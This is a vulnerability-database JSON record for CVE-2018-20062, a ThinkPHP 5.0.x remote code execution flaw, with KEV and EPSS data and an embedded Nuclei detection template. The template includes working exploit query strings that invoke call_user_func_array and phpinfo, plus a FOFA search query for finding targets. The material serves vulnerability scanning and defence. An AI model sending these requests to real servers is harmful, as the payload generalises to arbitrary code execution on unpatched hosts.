{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-20062/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-20062/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-20062/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-20062/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-20062/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-20062"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-20062"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.9953,
      "kev": true,
      "percentile": 0.99944
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-20062.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2018-20062\n\ninfo:\n  name: ThinkPHP 5.0.23 - Remote Code Execution\n  author: dr_set\n  severity: critical\n  description: |\n    An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\\think\\Request/input&filter=phpinfo&data=1 query string.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to complete system compromise, data theft, and potential lateral movement within the network.\n  remediation: |\n    Upgrade to ThinkPHP version 5.0.24 or later, or apply vendor-provided security patches.\n  reference:\n    - https://github.com/yilin1203/CVE-2018-20062/blob/main/CVE-2018-20062.py\n    - https://github.com/yilin1203/CVE-2018-20062\n    - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-20062\n    epss-score: 0.9953\n    epss-percentile: 0.99945\n    cpe: cpe:2.3:a:5none:nonecms:1.3.0:*:*:*:*:*:*:*\n  metadata:\n    vendor: 5none\n    product: nonecms\n    fofa-query: app=\"ThinkPHP\"\n    verified: true\n    max-request: 1\n  tags: cve,cve2018,kev,thinkphp,rce,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}?s=index/think\\\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"PHP Extension\"\n          - \"PHP Version\"\n          - \"ThinkPHP\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402200250f735abc22f328dfb103abc970cfe337f6e45b2af341bec319312894ec6f70220241231435c83dd273cdca84518bfb485d6f21d833603f339e9a701708d32fa1c:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-20062"
}